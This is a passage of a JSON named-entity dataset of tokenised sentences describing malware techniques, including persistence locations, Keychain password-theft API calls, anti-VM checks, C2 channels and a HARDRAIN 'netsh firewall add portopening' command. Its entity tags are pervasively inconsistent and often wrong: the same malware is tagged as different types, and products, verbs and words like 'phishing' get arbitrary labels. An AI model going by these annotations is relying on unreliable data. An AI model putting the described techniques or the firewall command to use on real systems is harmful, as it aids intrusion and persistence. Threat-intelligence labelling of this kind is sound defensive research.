"O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "has", "used", "HTTP", "over", "a", "non-standard", "port,", "such", "as", "TCP", "port", "46769." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "lists", "the", "running", "processes", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "creates", "a", "scheduled", "task", "to", "ensure", "it", "is", "re-executed", "everyday." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "uses", "WMI", "to", "check", "the", "BIOS", "and", "manufacturer", "information", "for", "strings", "like", "\"VMWare\",", "\"Virtual\",", "and", "\"XEN\"", "and", "another", "WMI", "request", "to", "get", "the", "current", "temperature", "of", "the", "hardware", "to", "determine", "if", "it's", "a", "virtual", "machine", "environment." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "collects", "the", "MAC", "address,", "computer", "name,", "and", "CPU", "information." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "collects", "the", "victim", "IP", "address,", "MAC", "address,", "as", "well", "as", "the", "victim", "account", "domain", "name." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "uses", "the", "<code>netstat</code>", "command", "to", "find", "open", "ports", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "collects", "the", "victim", "username", "along", "with", "other", "account", "information", "(account", "type,", "description,", "full", "name,", "SID", "and", "status)." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "has", "a", "feature", "to", "list", "the", "available", "services", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "can", "obtain", "the", "date", "and", "time", "of", "a", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O" ] }, { "tokens": [ "GravityRAT", "executes", "commands", "remotely", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GravityRAT", "collects", "various", "information", "via", "WMI", "requests,", "including", "CPU", "information", "in", "the", "Win32_Processor", "entry", "(Processor", "ID,", "Name,", "Manufacturer", "and", "the", "clock", "speed)." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "use", "DNS", "for", "C2", "communications." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "collect", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "use", "multiple", "custom", "routines", "to", "decrypt", "strings", "prior", "to", "execution." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "B-Tool", "O", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "delete", "the", "original", "executable", "after", "initial", "installation", "in", "addition", "to", "unused", "functions." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "use", "Keychain", "Services", "API", "functions", "to", "find", "and", "collect", "passwords,", "such", "as", "`SecKeychainFindInternetPassword`", "and", "`SecKeychainItemCopyAttributesAndData`." ], "ner_tags": [ "B-Tool", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Features", "B-Purp", "I-Features", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "create", "a", "Launch", "Agent", "with", "the", "`RunAtLoad`", "key-value", "pair", "set", "to", "<code>true</code>,", "ensuring", "the", "`com.apple.GrowlHelper.plist`", "file", "runs", "every", "time", "a", "user", "logs", "in." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "add", "a", "plist", "file", "in", "the", "`Library/LaunchDaemons`", "to", "establish", "persistence." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "add", "Login", "Items", "to", "establish", "persistence." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "has", "created", "a", "new", "executable", "named", "`Software", "Update", "Check`", "to", "appear", "legitimate." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "I-SamFile", "B-SecTeam", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "has", "been", "disguised", "as", "a", "Growl", "help", "file." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "has", "encrypted", "strings." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "use", "proxies", "for", "C2", "traffic." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "B-Org", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "add", "<code>init.d</code>", "and", "<code>rc.d</code>", "files", "in", "the", "<code>/etc</code>", "folder", "to", "establish", "persistence." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "use", "`uname`", "to", "identify", "the", "operating", "system", "name,", "version,", "and", "processor", "type." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "obtain", "proxy", "information", "from", "a", "victim's", "machine", "using", "system", "environment", "variables." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "collect", "the", "date", "and", "time", "from", "a", "compromised", "host." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "use", "shell", "scripts", "for", "execution,", "such", "as", "<code>/bin/sh", "-c</code>." ], "ner_tags": [ "B-Tool", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Green", "Lambert", "can", "establish", "persistence", "on", "a", "compromised", "host", "through", "modifying", "the", "`profile`,", "`login`,", "and", "run", "command", "(rc)", "files", "associated", "with", "the", "`bash`,", "`csh`,", "and", "`tcsh`", "shells." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "encrypts", "communications", "using", "RSA-2048." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way" ] }, { "tokens": [ "GreyEnergy", "digitally", "signs", "the", "malware", "with", "a", "code-signing", "certificate." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "encrypts", "its", "configuration", "files", "with", "AES-256", "and", "also", "encrypts", "its", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "can", "securely", "delete", "a", "file", "by", "hooking", "into", "the", "DeleteFileA", "and", "DeleteFileW", "functions", "in", "the", "Windows", "API." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "can", "download", "additional", "modules", "and", "payloads." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "GreyEnergy", "has", "a", "module", "to", "harvest", "pressed", "keystrokes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "has", "a", "module", "for", "Mimikatz", "to", "collect", "Windows", "credentials", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "modifies", "conditions", "in", "the", "Registry", "and", "adds", "keys." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "has", "used", "Tor", "relays", "for", "Command", "and", "Control", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "has", "a", "module", "to", "inject", "a", "PE", "binary", "into", "a", "remote", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "uses", "PsExec", "locally", "in", "order", "to", "execute", "rundll32.exe", "at", "the", "highest", "privileges", "(NTAUTHORITY\\SYSTEM)." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "is", "packed", "for", "obfuscation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "encrypts", "communications", "using", "AES256." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way" ] }, { "tokens": [ "GreyEnergy", "enumerates", "all", "Windows", "services." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "B-Idus" ] }, { "tokens": [ "GreyEnergy", "uses", "HTTP", "and", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "uses", "cmd.exe", "to", "execute", "itself", "in-memory." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "GreyEnergy", "chooses", "a", "service,", "drops", "a", "DLL", "file,", "and", "writes", "it", "to", "that", "serviceDLL", "Registry", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "use", "a", "hardcoded", "server", "public", "RSA", "key", "to", "encrypt", "the", "first", "request", "to", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "has", "the", "ability", "to", "add", "bytes", "to", "change", "the", "file", "hash." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "delete", "previously", "created", "tasks", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "collect", "data", "and", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "use", "a", "decryption", "algorithm", "for", "strings", "based", "on", "Rotate", "on", "Right", "(RoR)", "and", "Rotate", "on", "Left", "(RoL)", "functionality." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O" ] }, { "tokens": [ "GrimAgent", "has", "sent", "data", "related", "to", "a", "compromise", "host", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "delete", "old", "binaries", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "has", "the", "ability", "to", "enumerate", "files", "and", "directories", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "has", "the", "ability", "to", "download", "and", "execute", "additional", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "GrimAgent", "can", "pad", "C2", "messages", "with", "random", "generated", "values." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "use", "Native", "API", "including", "<code>GetProcAddress</code>", "and", "<code>ShellExecuteW</code>." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "O" ] }, { "tokens": [ "GrimAgent", "has", "used", "Rotate", "on", "Right", "(RoR)", "and", "Rotate", "on", "Left", "(RoL)", "functionality", "to", "encrypt", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "set", "persistence", "with", "a", "Registry", "run", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "has", "the", "ability", "to", "set", "persistence", "using", "the", "Task", "Scheduler." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "GrimAgent", "can", "base64", "encode", "C2", "replies." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "use", "an", "AES", "key", "to", "encrypt", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "collect", "the", "OS,", "and", "build", "version", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "has", "used", "<code>Accept-Language</code>", "to", "identify", "hosts", "in", "the", "United", "Kingdom,", "United", "States,", "France,", "and", "Spain." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Area", "O", "I-Area", "O", "B-Area", "O", "B-Area" ] }, { "tokens": [ "GrimAgent", "can", "identify", "the", "country", "code", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "enumerate", "the", "IP", "and", "domain", "of", "a", "target", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "identify", "the", "user", "id", "on", "a", "target", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "sleep", "for", "195", "-", "205", "seconds", "after", "payload", "execution", "and", "before", "deleting", "its", "task." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "has", "the", "ability", "to", "use", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "GrimAgent", "can", "use", "the", "Windows", "Command", "Shell", "to", "execute", "commands,", "including", "its", "own", "removal." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GuLoader", "can", "delete", "its", "executable", "from", "the", "<code>AppData\\Local\\Temp</code>", "directory", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GuLoader", "can", "download", "further", "malware", "for", "execution", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "GuLoader", "executable", "has", "been", "retrieved", "via", "embedded", "macros", "in", "malicious", "Word", "documents." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "GuLoader", "has", "relied", "upon", "users", "clicking", "on", "links", "to", "malicious", "documents." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GuLoader", "can", "use", "a", "number", "of", "different", "APIs", "for", "discovery", "and", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GuLoader", "has", "the", "ability", "to", "inject", "shellcode", "into", "a", "donor", "processes", "that", "is", "started", "in", "a", "suspended", "state.", "GuLoader", "has", "previously", "used", "RegAsm", "as", "a", "donor", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "GuLoader", "can", "establish", "persistence", "via", "the", "Registry", "under", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "GuLoader", "has", "been", "spread", "in", "phishing", "campaigns", "using", "malicious", "web", "links." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "GuLoader", "has", "the", "ability", "to", "perform", "anti-VM", "and", "anti-sandbox", "checks", "using", "string", "hashing,", "the", "API", "call", "<code>EnumWindows</code>,", "and", "checking", "for", "Qemu", "guest", "agent." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GuLoader", "has", "the", "ability", "to", "perform", "anti-debugging", "based", "on", "time", "checks,", "API", "calls,", "and", "CPUID." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "GuLoader", "can", "use", "HTTP", "to", "retrieve", "additional", "binaries." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "GuLoader", "has", "the", "ability", "to", "download", "malware", "from", "Google", "Drive." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "H1N1", "bypasses", "user", "access", "control", "by", "using", "a", "DLL", "hijacking", "vulnerability", "in", "the", "Windows", "Update", "Standalone", "Installer", "(wusa.exe)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "H1N1", "dumps", "usernames", "and", "passwords", "from", "Firefox,", "Internet", "Explorer,", "and", "Outlook." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "H1N1", "obfuscates", "C2", "traffic", "with", "an", "altered", "version", "of", "base64." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "H1N1", "kills", "and", "disables", "services", "for", "Windows", "Firewall." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "H1N1", "kills", "and", "disables", "services", "for", "Windows", "Security", "Center,", "and", "Windows", "Defender." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-SecTeam", "I-SecTeam", "O", "O", "B-SecTeam", "B-SecTeam" ] }, { "tokens": [ "H1N1", "contains", "a", "command", "to", "download", "and", "execute", "a", "file", "from", "a", "remotely", "hosted", "URL", "using", "WinINet", "HTTP", "requests." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "H1N1", "disable", "recovery", "options", "and", "deletes", "shadow", "copies", "from", "the", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "H1N1", "uses", "multiple", "techniques", "to", "obfuscate", "strings,", "including", "XOR." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "H1N1", "has", "functionality", "to", "copy", "itself", "to", "removable", "media." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "H1N1", "uses", "a", "custom", "packing", "algorithm." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "H1N1", "encrypts", "C2", "traffic", "using", "an", "RC4", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "H1N1", "has", "functionality", "to", "copy", "itself", "to", "network", "shares." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "H1N1", "kills", "and", "disables", "services", "by", "using", "cmd.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "HALFBAKED", "can", "delete", "a", "specified", "file." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "HALFBAKED", "can", "execute", "PowerShell", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "B-HackOrg", "B-Features" ] }, { "tokens": [ "HALFBAKED", "can", "obtain", "information", "about", "running", "processes", "on", "the", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HALFBAKED", "can", "obtain", "screenshots", "from", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "HALFBAKED", "can", "obtain", "information", "about", "the", "OS,", "processor,", "and", "BIOS." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HALFBAKED", "can", "use", "WMI", "queries", "to", "gather", "system", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "HAMMERTOSS", "exfiltrates", "data", "by", "uploading", "it", "to", "accounts", "created", "by", "the", "actors", "on", "Web", "cloud", "storage", "providers", "for", "the", "adversaries", "to", "retrieve", "later." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAMMERTOSS", "has", "used", "<code>-WindowStyle", "hidden</code>", "to", "conceal", "PowerShell", "windows." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "The", "\"tDiscoverer\"", "variant", "of", "HAMMERTOSS", "establishes", "a", "C2", "channel", "by", "downloading", "resources", "from", "Web", "services", "like", "Twitter", "and", "GitHub.", "HAMMERTOSS", "binaries", "contain", "an", "algorithm", "that", "generates", "a", "different", "Twitter", "handle", "for", "the", "malware", "to", "check", "for", "instructions", "every", "day." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAMMERTOSS", "is", "known", "to", "use", "PowerShell." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "HAMMERTOSS", "is", "controlled", "via", "commands", "that", "are", "appended", "to", "image", "files." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Before", "being", "appended", "to", "image", "files,", "HAMMERTOSS", "commands", "are", "encrypted", "with", "a", "key", "composed", "of", "both", "a", "hard-coded", "value", "and", "a", "string", "contained", "on", "that", "day's", "tweet.", "To", "decrypt", "the", "commands,", "an", "investigator", "would", "need", "access", "to", "the", "intended", "malware", "sample,", "the", "day's", "tweet,", "and", "the", "image", "file", "containing", "the", "command." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "\"Uploader\"", "variant", "of", "HAMMERTOSS", "visits", "a", "hard-coded", "server", "over", "HTTP/S", "to", "download", "the", "images", "HAMMERTOSS", "uses", "to", "receive", "commands." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "download", "and", "execute", "a", "second-stage", "payload." ], "ner_tags": [ "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "can", "collect", "system", "information,", "including", "computer", "name,", "system", "manufacturer,", "IsDebuggerPresent", "state,", "and", "execution", "path." ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "collect", "the", "victim", "user", "name." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "HARDRAIN", "opens", "the", "Windows", "Firewall", "to", "modify", "incoming", "connections." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HARDRAIN", "binds", "and", "listens", "on", "port", "443", "with", "a", "FakeTLS", "method." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "HARDRAIN", "uses", "FakeTLS", "to", "communicate", "with", "its", "C2", "server." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HARDRAIN", "uses", "the", "command", "<code>cmd.exe", "/c", "netsh", "firewall", "add", "portopening", "TCP", "443", "\"adp\"</code>", "and", "makes", "the", "victim", "machine", "function", "as", "a", "proxy", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HARDRAIN", "uses", "cmd.exe", "to", "execute", "<code>netsh</code>commands." ], "ner_tags": [ "B-Way", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "HAWKBALL", "has", "encrypted", "data", "with", "XOR", "before", "sending", "it", "over", "the", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAWKBALL", "has", "used", "an", "OLE", "object", "that", "uses", "Equation", "Editor", "to", "drop", "the", "embedded", "shellcode." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HAWKBALL", "has", "encrypted", "the", "payload", "with", "an", "XOR-based", "algorithm." ], 